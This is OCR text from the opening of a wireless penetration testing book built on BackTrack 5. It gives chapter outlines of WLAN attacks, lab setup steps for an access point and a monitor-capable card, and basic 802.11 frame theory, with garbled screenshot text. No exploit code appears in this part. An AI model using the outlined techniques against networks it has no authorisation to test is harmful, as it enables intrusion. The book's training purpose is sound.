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Wireless Networks have become ubiquitous in today's world. Millions of people use them 
worldwide every day at their homes, offices, and public hotspots to log on to the Internet 
and do both personal and professional work. Even though wireless makes life incredibly 
easy and gives us such great mobility, it comes with its risks. In recent times, insecure 
wireless networks have been exploited to break into companies, banks, and government 
organizations. The frequency of these attacks has only intensified, as the network 
administrators are still clueless on how to secure wireless in a robust and foolproof way. 





BackTrack 5 Wireless Penetration Testing: Beginner's Guide is aimed at helping the 

reader understand the insecurities associated with wireless networks, and how to conduct 
penetration tests to find and plug them. This is an essential read for those who would like 
to conduct security audits on wireless networks and always wanted a step-by-step practical 
guide for the same. As every wireless attack explained in this book is immediately followed 
by a practical demo, the learning is very complete. 


We have chosen BackTrack 5 as the platform to test all the wireless attacks in this book. 
BackTrack, as most of you may already be aware, is the world's most popular penetration 
testing distribution. It contains hundreds of security and hacking tools, some of which we will 
use in this course of this book. 
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Chapter 1, Wireless Lab Setup, introduces dozens of exercises that we will be doing in this 
book. In order to be able to try them out, the reader will need to set up a wireless lab. 

This chapter focuses on how to create a wireless testing lab using off the shelf hardware 
and open source software. We will first look at the hardware requirements which include 
wireless cards, antennas, access points, and other Wi-Fi-enabled devices, then we will shift 
our focus to the software requirements which include the operating system, Wi-Fi drivers, 
and security tools. Finally, we will create a test bed for our experiments and verify different 
wireless configurations on it. 
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Chapter 2, WLAN and its Inherent Insecurities, focuses on the inherent design flaws in 
wireless networks which makes them insecure out-of-the-box. We will begin with a quick 
recap of the 802.11 WLAN protocols using a network analyzer called Wireshark. This will 

give us a practical understanding about how these protocols work. Most importantly, we 

will see how client and access point communication works at the packer level by analyzing 
Management, Control and Data frames. We will then learn about packet injection and packer 
sniffing in wireless networks, and look at some tools which enable us to do the same. 


Chapter 3, Bypassing WLAN Authentication, talks about how to break a WLAN authentication 
mechanism! We will go step-by-step and explore how to subvert Open and Shared Key 
authentications. In course of this, you will learn how to analyze wireless packets and figure 
out the authentication mechanism of the network. We will also look at how to break into 
networks with Hidden SSID and MAC Filtering enabled. These are two common mechanisms 
employed by network administrators to make wireless networks more stealthy and difficult 
to penetrate, however, these are extremely simple to bypass. 


Chapter 4, WLAN Encryption Flaws, discusses one of the most vulnerable parts of the 
WLAN protocol are the Encryption schemas— WEP, WPA, and WPA2. Over the past decade, 
hackers have found multiple flaws in these schemas and have written publically available 
software to break them and decrypt the data. Even though WPA/WPAQ is secure by design, 
misconfiguring those opens up security vulnerabilities, which can be easily exploited. In this 
chapter, we will understand the insecurities in each of these encryption schemas and do 
practical demos on how to break them. 


Chapter 5, Attacks on the WLAN Infrastructure, shifts our focus to WLAN infrastructure 
vulnerabilities. We will look at the vulnerabilities created due to both configuration and 
design problems. We will do practical demos of attacks such as access point MAC spoofing, 
bit flipping and replay attacks, rogue access points, fuzzing, and denial of service. This 
chapter will give the reader a solid understanding of how to do a penetration test of the 
WLAN infrastructure. 


Chapter 6, Attacking the Client, opens your eyes if you have always believed that wireless 
client security was something you did not have to worry about! Most people exclude the 
client from their list when they think about WLAN security. This chapter will prove beyond 
doubt why the client is just as important as the access point when penetrating testing a 
WLAN network. We will look at how to compromise the security using client side attacks 
such as mis-association, Caffe Latte, disassociation, ad-hoc connections, fuzzing, honeypots, 
and a host of others. 
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Chapter 7, Advanced WLAN Attacks, looks at more advanced attacks as we have already 
covered most of the basic attacks on both the infrastructure and the client. These attacks 
typically involve using multiple basic attacks in conjunction to break security in more 
challenging scenarios. Some of the attacks which we will learn include wireless device 
fingerprinting, man-in-the-middle over wireless, evading wireless intrusion detection and 
prevention systems, rogue access point operating using custom protocol, and a couple of 
others. This chapter presents the absolute bleeding edge in wireless attacks out in the 
real world. 


Chapter 8, Attacking WPA Enterprise and RADIUS, graduates the user to the next level by 
introducing him to advanced attacks on WPA-Enterprise and the RADIUS server setup. These 
attacks will come in handy when the reader has to perform a penetration test on a large 
Enterprise networks which rely on WPA-Enterprise and RADIUS authentication to provide 
them with security. This is probably as advanced as Wi-Fi attacks can get in the real world. 


Chapter 9, Wireless Penetrating Testing Methodology, is where all the learning from the 
previous chapters comes together, and we will look at how to do a wireless penetration test 
in a systematic and methodical way. We will learn about the various phases of penetration 
testing—planning, discovery, attack and reporting, and apply it to wireless penetration 
testing. We will also understand how to propose recommendations and best practices after a 
wireless penetration test. 


Appendix A, Conclusion and Road Ahead, concludes the book and leaves the user with some 
pointers for further reading and research. 


What you need for this book 


To follow and recreate the practical exercises in this book, you will need two laptops with 
built-in Wi-Fi cards, an Alfa AWUSO36H USB wireless Wi-Fi adapter, BackTrack 5, and some 
other hardware and software. We have detailed this in Chapter 1, Wireless Lab Setup. 


As an alternative to the two laptop setup, you could also create a Virtual Machine housing 
BackTrack 5 and connect the card to it over the USB interface. This will help you get started 
with using this book much faster, but we would recommend a dedicated machine running 
BackTrack 5 for actual assessments in the field. 


As a prerequisite, readers should be aware of the basics of wireless networks. This includes 
having prior knowledge about the basics of the 802.11 protocol and client access point 
communication. Though we will briefly touch upon some of this when we set up the lab, it is 
expected that the user is already aware of these concepts. 
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Though this book is a Beginner's series, it is meant for all levels of users, from amateurs 

right through to wireless security experts. There is something for everyone. The book starts 
with simple attacks but then moves on to explain the more complicated ones, and finally 
discusses bleeding edge attacks and research. As all attacks are explained using practical 
demonstrations, it is very easy for readers at all levels to quickly try the attack out by 
themselves. Please note that even though the book highlights the different attacks which can 
be launched against a wireless network, the real purpose is to educate the user to become a 
wireless penetration tester. An adept penetration tester would understand all the attacks out 
there and would be able to demonstrate them with ease, if requested by his client. 
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In this book, you will find several headings appearing frequently. 


To give clear instructions of how to complete a procedure or task, we use: 


Time for action —heading 


1. Action1 
2. Action 2 
3. Action 3 


Instructions often need some extra explanation so that they make sense, so they are 
followed with: 
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This heading explains the working of tasks or instructions that you have just completed. 






You will also find some other learning aids in the book, including: 


These are short multiple choice questions intended to help you test your own understanding. 


These set practical challenges and give you ideas for experimenting with what you 
have learned. 
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You will also find a number of styles of text that distinguish between different kinds of 
information. Here are some examples of these styles, and an explanation of their meaning. 


Code words in text are shown as follows: "We enabled the interface using the | f conf i g 
command." 


Words that you see on the screen, in menus or dialog boxes for example, appear in the text 
like this: "In order to see the data packets for our access point, add the following to the filter 
(wlan.bssid == 00:21:91:d2:8e:25) && (wlan.fc.type subtype == 0x20)." 


| Warnings or important notes appear in a box like this. | 


| Q Tips and tricks appear like this. | 


Feedback from our readers is always welcome. Let us know what you think about this book— 
what you liked or may have disliked. Reader feedback is important for us to develop titles 
that you really get the most out of. 


To send us general feedback, simply send an e-mail to f eedback@packt pub. com, and 
mention the book title through the subject of your message. 


If there is a book that you need and would like to see us publish, please send us a note in the 
SUGGEST A TITLE form on www. packt pub. comore-mailsuggest @packt pub. com. 


If there is a topic that you have expertise in and you are interested in either writing or 
contributing to a book, see our author guide on www. packt pub. com/ authors. 
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Now that you are the proud owner of a Packt book, we have a number of things to help you 
to get the most from your purchase. 
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Although we have taken every care to ensure the accuracy of our content, mistakes do 
happen. If you find a mistake in one of our books—maybe a mistake in the text or the 
code—we would be grateful if you would report this to us. By doing so, you can save other 
readers from frustration and help us improve subsequent versions of this book. If you 

find any errata, please report them by visiting http://www. packtpub. com support, 
selecting your book, clicking on the errata submission form link, and entering the details 
of your errata. Once your errata are verified, your submission will be accepted and the 
errata will be uploaded on our website, or added to any list of existing errata, under the 
Errata section of that title. Any existing errata can be viewed by selecting your title from 
http://www. packtpub. com/ support. 
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Piracy of copyright material on the internet is an ongoing problem across all media. At Packt, 
we take the protection of our copyright and licenses very seriously. If you come across any 
illegal copies of our works, in any form, on the internet, please provide us with the location 
address or website name immediately so that we can pursue a remedy. 


Please contact us atcopyri ght @packt pub. com with a link to the suspected 
pirated material. 


We appreciate your help in protecting our authors, and our ability to bring you 
valuable content. 
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You can contact us at questions @packt pub. com if you are having a problem with any 
aspect of the book, and we will do our best to address it. 
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Behind every successful execution is hours or days of preparation, and Wireless 
Penetration testing is no exception. In this chapter, we will create a wireless 
lab that we will use for our experiments in this book. Consider this lab as your 
preparation arena before you dive into the real-world penetration testing! 


Wireless Penetration testing is a practical subject and it is important to first setup a lab where 
we can try out all the different experiments in this book in a safe and controlled environment. 
It is important that you set up this lab first before proceeding ahead in this book. 


In this chapter, we shall look at the following: 


Hardware and software requirements 
BackTrack 5 installation 
Setting up an access point and configuring it 


Installing the wireless card 
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Testing connectivity between the laptop and the access point 


So let the games begin! 


Wireless Lab Setup 
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We will need the following hardware to set up the wireless lab: 


@ Two laptops with internal Wi-Fi cards: We will use one of the laptops as the victim 
in our lab and the other as the penetration tester's laptop. Though almost any 
laptop would fit this profile, laptops with at least 3 GB RAM is desirable. This is 
because we may be running a lot of memory-intensive software in our experiments. 


€ One Alfa wireless adapter: We need a USB Wi-Fi card that can support packet injection 
and packet sniffing, and that is supported by Backtrack. The best choice seems to be 
the Alfa AWUSO36H card from Alfa Networks as BackTrack supports this out-of-the- 
box. This is available on Amazon.com for a retail price of $34 at the time of writing. 


€ One access point: Any access point which supports WEP/WPA/WPA2 encryption 
standards would fit the bill. | will be using a Wireless N Router for 


the purpose of illustration in this entire book. You can purchase it from Amazon.com 
where it is retailing at around $35 at the time of writing. 





€ Anlnternet connection: This will come in handy to perform research, download 
software, and for some of our experiments. 


Software requirements 


We will need the following software to set up the wireless lab: 


€  BackTrack 5: BackTrack can be downloaded from their official website located at 
The software is open source and you 
should be able to download it directly from the website. 


@ Windows XP/Vista/7: You will need any one of Windows XP, Windows Vista, or 
Windows 7 installed in one of the laptops. This laptop will be used as the victim 
machine for the rest of the book. 


It is important to note that even though we are using a Windows-based OS for our tests, the 
techniques learnt can be applied to any Wi-Fi capable devices such as Smart Phones and 
Tablets, among others. 





Let us now quickly look at how to get up and running with BackTrack. 


BackTrack will be installed on the laptop which will serve as the penetration tester's machine 
for the rest of the book. 
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Time for action - installing BackTrack 





BackTrack is relatively simple to install. We will run BackTrack by booting it as a Live DVD and 
then install it on the hard drive. 


Perform the following instructions step-by-step: 


1. Burn the BackTrack ISO (we are using the BackTrack 5 KDE 32-Bit edition) that you 
have downloaded into a bootable DVD. 


2. Boot the laptop with this DVD and select the option BackTrack Text — Default Boot 
Text Mode from the boot menu: 


BackTrack Live CD 


BackTrack Stealth - Mo Networking enabled 
BackTrack Forensics — Mo Drive orta ount 
BackTrack noDRM — Ho DRM Driuerz.—— 
BackTrack Debug - Safe Mode : 
BackTrack Memtest — Run memtest 


Hard Drive Boot - boot the first hard dik 


<< hack | track 5 


Fress [Tab] to edit options 
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3. If booting was successful then you should see the familiar BackTrack screen: 


<< back | track & 


Tel Welcome to the BackTrack 5 Distribution, Codename “Revolution” 
Lis Official DackTrack Hone lage: http:zwuu.barktrack-llnux.ürg 


te] Official BackTrack Training : hitp:zzums.offensluc-securily.con 
düszüdiüsüddgERHEH SERI SERE USERS USER ERE REEF SERI BEE USE 


fed To start a graphical interfacc, type " 
fel The default moot parzunrd 1x " ie 


HE startz_ 


“The quieler you bacon, De more you are able to hear 





4. You can boot into the graphical mode by entering startx on the command prompt. 
Enjoy the boot music! Once you are in the GUI, your screen should resemble 
the following: 


k 


ge 


Install 
BackTrack 


11:14 am 
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5. Now click on the Install BackTrack icon to the top-left of the desktop. This will 
launch the BackTrack installer as shown next: 


English 
Espanol 
Esperanto 
Euskara 


Francais 


Italiano 
Kurdi 
Latviski 
Lietuviškai 


Magyar 


Step 1 of 7 


ES 





Install 


Welcome 


Ready to install? Once you answer a few questions, the 


contents of the live CD can be installed on this computer 
so you can run BackTrack Live at full speed without the CD. 


Answering the questions should only take a few 


6. This installer is similar to the GUI-based installers of most Linux systems and should 
be simple to follow. Select the appropriate options in each screen and start the 
installation process. Once the installation is done, restart the machine as prompted, 


and remove the DVD. 


7. Once the machine restarts, it will present you with a login screen. Type in the login 


as "root" and password as "toor". You should now be logged into your installed 


version of BackTrack. Congratulations! 


| will be changing the desktop theme and some settings for this book. Feel free to use your 


own themes and color settings! 
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We have successfully installed BackTrack on the laptop! We will use this laptop as the 
penetration tester's laptop for all other experiments in this book. 


Have a go hero — installing BackTrack on Virtual Box 


We can also install BackTrack within virtualization software such as Virtual Box. For readers 
who might not want to dedicate a full laptop to BackTrack, this is the best option. The 
installation process of BackTrack in Virtual Box is exactly the same. The only difference is the 
pre-setup, which you will have to create in Virtual Box. Have a go at it! You can download 

















One of the other ways we can install and use BackTrack is via USB drives. This is particularly 
useful if you do not want to install on the hard drive but still want to store persistent data on 


your BackTrack instance, such as scripts and new tools. We would encourage you to try this 
out as well! 
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Now we will set up the access point. As mentioned earlier, we will be using the D-LINK DIR- 
615 Wireless N Router for all the experiments in this book. However, feel free to use any 
other access point. The basic principles of operation and usage remain the same. 


Time for action — configuring the access point 





Let us begin! We will set the access point up to use Open Authentication with an SSID of 
“Wireless Lab". 


Follow these instructions step-by-step: 


1. Power on the access point and use an Ethernet cable to connect your laptop to one 
of the access point's Ethernet ports. 
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2. Enter the IP address of the access point configuration terminal in your browser. For 
‘the DIR-615, it is given to be 192.168.0.1 in the manual. You should consult your 


access point's setup guide to find its IP address. If you do not have the manuals 
for the access point, you can also find the IP address by running the route -n. 
command. The gateway IP address is typically the access point's IP. Once you are 
connected, you should see a configuration portal which looks like this: 





Be nee ERAS TEETER p Ree M B Pd 
VIRELESS RO JTER: Log Aozi 


ry Bookmarks Tools 


@ € x e omnim 


| |. D-LINK SYSTEMS, INC. | WIRELESS R... | + | 














Product Page: DIR-615 Hardware Version: B2 








Log in to the router: 


: Admin + 


WIRELESS 


Copyright © 2004-2007 D-Link Systems, Inc. 


"vate 
p S3rox # 





3. Explore the various settings in the portal after logging in and find the settings related 
to configuring a new 
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4. Change the SSID to Wireless Lab. Depending on the access point, you may have to 


reboot it for the settings to change: 
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SETUP ADVANCED TOOLS STATUS SUPPORT 


INTERNET 


WIRELESS SETTINGS Use this section to configure the wireless settings for your D-Link Router. Please note that 


changes made on this section may also need to be duplicated on your Wireless Client. 


Dant Save setings 


WIRELESS NETWORK SETTINGS 


NETWORK SETTINGS 


Enable Wireless : [7| Aways ~ 

Wireless Network Name: WirelessLab | (Also called the SSID) 
802.11 Mode: Mixed 802. 1in, 802. 11g and 802.11b w 

Enable Auto Channel Scan : V! 

Wireless Channel: | 2.437 GHz - CH 6 
Transmission Rate: Best (automatic) ~ (Mbit/s) 

Channel Width : 20 MHz - 
Visibility Status: © Visible © Invisible 








WIRELESS SECURITY MODE 


To protect your privacy you can configure wireless security features. This device supports three 
wireless security modes, including WEP, WPA-Personal, and WPA-Enterprise. WEP is the original 
wireless encryption standard. WPA provides a higher level of security. WPA-Personal does not 
require an authentication server. The WPA-Enterprise option requires an external RADIUS server. 


Security Mode : None 


Helpful Hints... 


Changing your Wireless 
Network Name is the first 
step in securing your 
wireless network. Change 
it to a familiar name that 
does not contain any 
personal information. 


Enable Auto Channel Scan 
so that the router can 
select the best possible 
channel for your wireless 
network to operate on. 


Enabling Hidden Mode is 
another way to secure 
your network. With this 
option enabled, no wireless 
dients will be able to see 
your wireless network 
when they scan to see 
what's available. For your 
wireless devices to connect 
to your router, you will 
need to manually enter the 
Wireless Network Name on 
each device. 


If you have enabled 
Wireless Security, make 
sure you write down the 
Key or Passphrase that 
you have configured. You 
will need to enter this 
information on any wireless 
device that you connect to 
your wireless network. 





6. Save the changes to the access point and reboot it, if required. Now your access 


point should be up and running with an SSID Wireless Lab. 


An easy way to verify this is to use the Wireless Configuration utility on Windows and 
observe the available networks using the Windows Laptop. You should find Wireless Lab as 


one of the networks in the listing: 


Chapter 1 


© a Connect to a network 


Disconnect or connect to another network 


Show |All 


Unsecured network 
Security-enabled network 


LL Unnamed Network Unsecured network 


Set up a connection or network 
Open Network and Sharing Center 


Disconnect | Cancel 





X 5990 A 
We have successfully set up our access point with an SSID Wireless Lab. It is broadcasting 
its presence and this is being picked up by our Windows laptop and others within the Radio 





It is important to note that we have configured our access point in Open mode, which is 
the least secure. It is advisable not to connect this access point to the Internet for the time 
being, as anyone within the RF range will be able to use it to access the Internet. 


Have a go hero — configuring the access point to use WEP and WPA 


Play around with the configuration options of your access point. Try to see if you can get it 
up and running using encryption schemes such as WEP and WPA/WPA2. We will use these 
modes in the later chapters to illustrate attacks against them. 


KEW: OT VED FEREARE 


Setting up our ALFA wireless card is much easier than the access point. The advantage is that 
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Time for action — configuring your wireless card 


We will be using the Alfa wireless card with the penetration tester's laptop. 





Please follow these instructions step-by-step to set up your card: 


1. Pluginthe card to one of the BackTrack laptop's USB ports and boot it. 


2. Once you log in, open a console terminal and type ini wconf ig. Your screen should 
resemble as follows: 


root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings 


root@bt:~# iwconfig 
no wireless extensions. 


no wireless extensions. 
wmasterO no wireless extensions. 


wlanO IEEE 802.11bg ESSID:"" 
Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated 
Tx-Power=0 dBm 
Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management: off 
Link Quality:0 Signal level:0 Noise level:0 


Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 


root@bt:~# li 


v. @ root@bt: ~ - Shell - Ko 





As you can see, Wl an0 is the wireless interface created for the Alfa wireless card. 


Typeinifconfig wlan0 up to bring the interface up. Then type ini f config 


wl an0 to see the current state of the interface: 


AEM 
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root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





rootoot:-# ifconfig wlan0 up 

rootoot:-# ifconfig wlan0 

wlanO Link encap:Ethernet HWaddr 00:c0:ca:3e:bd:93 
UP BROADCAST MULTICAST MTU:1500 Metric:1 
RX packets:0 errors:0 dropped:0 overruns:0O frame:0 
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) 


tēbt:-# J 





i | @ Shell | 


^N AD dá a - gnc 2c | ly @ root@bt: ~ - Shell - Ko: 








3. The MAC address 00: c0: ca: 3e: bd: 93 should match the MAC address written 
under your Alfa card. This is a quick check to ensure that you have enabled the 


correct interface. 






OV OAK 
BackTrack ships with all the required drivers for the Alfa card. As soon as the machine 
booted, the card was recognized and was assigned the network interface wl an0. 
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Now we will look at how to connect to the access point using the Alfa wireless card. Our 
access point has an SSID Wireless Lab and does not use any authentication. 


HOM 


Wireless Lab Setup 





Time for action - configuring your wireless card 
Here we go! Follow these steps to connect your wireless card to the access point: 


1. Let us first see what wireless networks our Alfa card is currently detecting. Issue 





root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


ooteot:-# iwlist wlanð scanning 
wlanO Scan completed : 
Cell 01 - Address: 00:25:5E:17:41:4C 
Channel:1 
Frequency:2.412 GHz (Channel 1) 
Quality-57/70 Signal level--53 dBm 
Encryption key:on 
ESSID: "Vivek" 
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s 
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 
36 Mb/s; 48 Mb/s; 54 Mb/s 
Mode:Master 
Extra: tsf=000000322b8db23c 
Extra: Last beacon: 2586ms ago 
IE: Unknown: 0005566976656B 
IE: Unknown: 010482848B96 
IE: Unknown: 030101 
IE: Unknown: 2A0104 
IE: Unknown: 32080C1218243048606C 
IE: WPA Version 1 
Group Cipher : TKIP 
Pairwise Ciphers (1) : TKIP 
Authentication Suites (1) : PSK 
Cell 02 - Address: 00:25:5E:17:41:4D 
Channel:1 





root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


Cell 05 - Address: 00:21:91:D2:8E:25 
Channel:9 
Frequency:2.452 GHz (Channel 9) 
Quality=70/70 Signal level=-15 dBm 
Encryption key:off 
ESSID: "Wireless Lab" 
Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s 
Bit Rates:6 Mb/s; 9 Mb/s; 12 Mb/s; 18 Mb/s; 24 Mb/s 
36 Mb/s; 48 Mb/s; 54 Mb/s 
Mode:Master 
Extra: tsf=00000001c7fb4180 
Extra: Last beacon: 13ms ago 
: Unknown: 000C576972656C657373204C6162 
: Unknown: 010482848B96 
: Unknown: 030109 
: Unknown: 2A0100 
: Unknown: 32080C1218243048606C 
: Unknown: DD180050F2020101000003A4000027A4000042435E0062322F00 
: Unknown: DD1E00904C334C101FFFFF0000000000000000000000000000000 





: Unknown: DD1A00904C34090004000000000000000000000000000000000090 


: Unknown: 2D1A4ClO1FFFFF000000000000000000000000000004000000000 


: Unknown: 3D1609000000000000000000000000000000000000000000 
: Unknown: DD790050F204104A0001101044000102103B00010310470010AB0|4 


vv 
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3. As multiple access points can have the same SSID, verify that the MAC address 
mentioned in the Address field above matches your access point's MAC. 


or using the web- 





based GUI settings. 


4. Now, issue the command iwconfig whano essid "Wireless Lab" andthen 


If you have successfully connected to the 
access point, you should see the MAC address of the access point in the Access 
Poi nt: field in the output of | wconf! g, as shown in the following screenshot: 





[| 
[3] 


root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 





rootebt:-# iwconfig wlanO essid "Wireless Lab" 

root@bt :~# 

root@bt :~# 

root@bt :~# 

abt:~# iwconfig wlanO 

IEEE 802.11bg ESSID:"Wireless Lab" 
Mode:Managed  Frequency:2.452 GHz Access Point: 00:21:91:D2:8E:25 
Bit Rate-1 Mb/s | Tx-Power-27 dBm 
Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management: off 
Link Quality-70/70 Signal level=-9 dBm 


Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:0 Missed beacon:0 


:~# 
:~# 
:~# 


:-4 § 
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5. We know the access point has a management interface IP address "192.168.0.1" 
from its manual. Alternatively, this is the same as the default router IP address when 


we runtheroute -n command. Let's set our IP address in the same subnet 


root@bt: ~ - Shell - Konsole 
Edit View Bookmarks Settings Help 





Got:-# ifconfig wlanO 192.168.0.2 netmask 255.255.255.0 up 
root@bt:~# 
root@bt :~# 
:~# ifconfig wlanO 
Link encap:Ethernet  HWaddr 00:c0:ca:3e:bd:93 
inet addr:192.168.0.2 Bcast:192.168.0.255 Mask:255.255.255. 
inet6 addr: fe80::2c0:caff:fe3e:bd93/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 
RX packets:107 errors:0 dropped:0 overruns:0 frame:0 
TX packets:93 errors:0 dropped:0 overruns:0 carrier:0 
collisions:0 txqueuelen: 1000 
RX bytes:82778 (82.7 KB) TX bytes:10597 (10.5 KB) 


root@bt :~# 
root@bt :~# 
root@bt:~# J 





6. Now let's ping the access point by issuing the command ping 192.168. 0.1. Ifthe 
network connection has been set up properly, then you should see the responses. 





from the access point. You can additionally issue anarp -a to verify that the 


response is coming from the access point. You should see that the MAC address 

of the IP 192.168.0.1 is the access point's MAC address we have noted earlier. It is 
important to note that some of the more recent access points might have response 
to ICMP Echo Request packets disabled. This is typically done to make the access 
point secure out-of-the-box with only the bare minimum configuration settings 
available. In such a case, you could try to launch a browser and access the web 
interface to verify that the connection is up and running. 


ears 
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root@bt: ~ - Shell - Konsole 
Session Edit View Bookmarks Settings Help 


root@bt:~# ping 192.168.0.1 

.168.0.1 (192.168.0.1) 56(84) bytes of data. 

from 192.168.0.1: icmp seq-1 ttl=64 time=13.5 
from 192.168.0.1: icmp seq-2 ttl=64 time-12.3 
from 192.168.0.1: icmp seq-3 ttl=64 time-12.7 
from 192.168.0.1: icmp seq-4 ttl-64 time-8.17 
from 192.168.0.1: icmp seq-5 ttl=64 time-14.8 
from 192.168.0.1: icmp seq=6 ttl=64 time=4.75 





--- 192.168.0.1 ping statistics --- 

6 packets transmitted, 6 received, 0% packet loss, time 5008ms 
rtt min/avg/max/mdev = 4.758/11.082/14.858/3.500 ms 
root@bt :~# 

root@bt :~# 

root@bt :~# 

root@bt:~# arp -a 

? (192.168.0.1) at 00:21:91:d2:8e:25 [ether] on wlanO 
root@bt :~# 

root@bt:~# 

root@bt :~# 

root@bt :~# 

root@bt:~# J 
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DEVICE INFO Helpful Hints... 

: . 3 Check the log frequently t 

Use this option to view the router logs. You can define what types of events you want to a e Varna dis 

view and the event levels to view. This router also has internal syslog server support so you network usnne. 

can send the log files to a computer on your network that is running a syslog utility. E 

INTERNET SESSIONS You can also have the log 
mailed to you periodically. 


WIRELESS LOG OPTIONS Refer to 


STATISTICS 











What to View : Firewall & Security | Router Status 
View Levels: |) Critical iv Informational 


Apply Log Settings Now 






































LOG DETAILS 





| Refresh | | Gear | Email Now Save Log 


3 Log Entries:? 
Priority Time Message 
Sat Jan 31 13:23:24 Wireless system with MAC address Q0COCA3EBD93 
2004 associated 


Sat Jan 31 13:23:13 
[INFO] 5004 


[INFO] 


Log viewed by IP address 192.168.0.2 


Sat Jan 31 13:23:13 


[INFO] 2004 Log cleared by IP address 192.168.0.2 
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K 38999 AW; T Fa 
We just connected to our access point successfully from BackTrack using our Alfa wireless 
card as the wireless device. We also learnt how to verify that a connection has been 
established at both the wireless client and the access point side. 














Have a go hero — establishing connection in WEP configuration 


Here is a challenging exercise for you—set up the access point in WEP configuration. For 
each of these, try establishing a connection with the access point using the wireless adapter. 
Hint: 









1. After issuing the commandif config wlan0 up, how do you verify the wireless 
card is up and functional? 


2. Can we run all our experiments using the BackTrack live CD alone? And not install it 
to the hard drive? 


What does the commandarp -a show? 
4. Which tool should we use in BackTrack to connect to WPA/WPA2 networks? 


OORT 


This chapter provided you with detailed instructions on how to set up your own wireless lab. 
Also, in the process, you have learned the basic steps towards: 


€ Installing BackTrack on your hard drive and exploring other options like VMware 
and USB 
Configuring your access point over the web interface 
Understanding and using several commands to configure and use your wireless card 
How to verify the connection state between the wireless client and the access point 


It is important that you gain confidence in configuring the system. If not, it is advisable that 


you repeat these examples a couple of times. In later chapters, we will be designing more 
complicated scenarios. 


In the next chapter, we will learn about the inherent insecurities in WLANs because of 
design. We will be using the network analyzer tool Wireshark to understand these concepts 
in a practical way. 





i "The loftier the building, the deeper the foundation must be laid." 
AS 


= Thomas Kempis, Writer 
Nothing great can be built on a weak foundation, and in our context, nothing 


secure can be built on something which is inherently insecure. 


WLANs by design have certain insecurities which are relatively easy to exploit, such as packet 
spoofing, packet injection, and sniffing (which could even happen from far away). We will 
explore those flaws in this chapter. 


In this chapter, we will look at the following: 


Revisiting WLAN frames 
Different frame types and sub-types 
Using Wireshark to sniff Management, Control, and Data frames 


Sniffing data packets for a given wireless network 


*« 9 9 9 9 


Injecting packets into a given wireless network 


Let's get started! 


WLAN and Its Inherent Insecurities 


Revisiting WLAN frames 


As this book deals with the security aspects of Wireless network, we will assume that you 
already have a basic understanding of the protocol and the packet headers. If not or if it's 
been some time since you worked on wireless network, this would be a good time to revisit 
it again. 


Let us now quickly review some basic concepts of WLANs which most of you may already be 
aware of. In WLANs, communication happens over frames. A frame would have the following 
header structure: 


Frame Address Address Address Sequence Address QoS 
Control 2 3 Control 4 Control 


t C Co CGC C CGC GD €———» €———»«€-————» 


Bytes 2 2 6 6 6 2 6 2 0 to 4 
2312 





The "Frame Control" field itself has a more complex structure: 


Frame Duration/ Address Address Address Sequence Address QoS Frame 
Control ID 1 2 3 Control 4 Control Body 


Protocol More Data Protected 
Frame 





' 
eM 
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The Type field defines the type of WLAN frame, which has three possibilities: 


1. Management frames: Management frames are responsible for maintaining 
communication between the access points and wireless clients. The Management 
frames can have the following sub-types: 


a Authentication 
a  De-authentication 
a Association Request 
a Association Response 
a  Reassociation Request 
a  Reassociation Response 
a  Disassociation 
a Beacon 
a Probe Request 
a Probe Response 
2. Control frames: Control frames are responsible for ensuring a proper exchange of 


data between the access point and wireless clients. Control frames can have the 
following sub-types: 


a Request to Send (RTS) 
a Clear to Send (CTS) 
a Acknowledgement (ACK) 


3. Data frames: Data frames carry the actual data sent on the wireless network. There 
are no sub-types for data frames. 


We will discuss the security implications of each of these frames when we discuss different 
attacks in later chapters. 


We will now look at how to sniff these frames over a wireless network using Wireshark. 
There are other tools like Airodump-NG, Tcpdump, or Tshark which can used for sniffing 

as well. We will, however, use Wireshark for most of this book, but we encourage you to 
explore other tools. The first step in doing this is to create a monitor mode interface. This 
will create an interface for our Alfa card which allows us to read all wireless frames in the air, 
regardless of whether it is destined for us or not. In the wired world, this is popularly called 
promiscous mode. 


eec 
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Time for action — creating a monitor mode interface 


Let's now set our Alfa card into monitor mode! 





Follow these instructions to get started: 


1. Boot into BackTrack with your Alfa card connected. Once you are within the console, 
enter i wconf i g to confirm that your card has been detected and the driver has 
been loaded properly: 


nE rost@bt: — - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


root@bt:-# iwconfig 
Lo no Wireless extensions. 


etha no wireless extensions. 
wmasterB no wireless extensions. 


wlang IEEE 802.11bg ESSID:"" 
Mode:Managed  Frequency:2.412 GHz Access Point: Not-Associated 
Tx-Power=27 dBm 
Retry min limit:7 RTS thr:off Fragment thr:off 
Encryption key:off 
Power Management: off 
Link Quality:8 Signal level:0 Noise level:6 


Rx invalid nwid:8 Rx invalid crypt:8 Rx invalid frag:0 
Tx excessive retries:0 Invalid misc:6 Missed beacon:0 


rootabt:~# 




















2. Usetheifconfig wlan0 up command to bring the card up. Verify the card is up 
byrunningi f config wl an0. You should see the word UP in the second line of the 


output as shown: 


egi 


mo 
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root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 





:~# ifconfig wlanO up 
Dd 

:~# 

:~# 

:~# ifconfig wlan 


Link encap:Ethernet HWaddr 00:c0:ca:3e:bd:93 

UP BROADCAST MULTICAST MTU:1500 Metric:1 

RX packets:0 errors:0 dropped:0 overruns:0 frame:0 
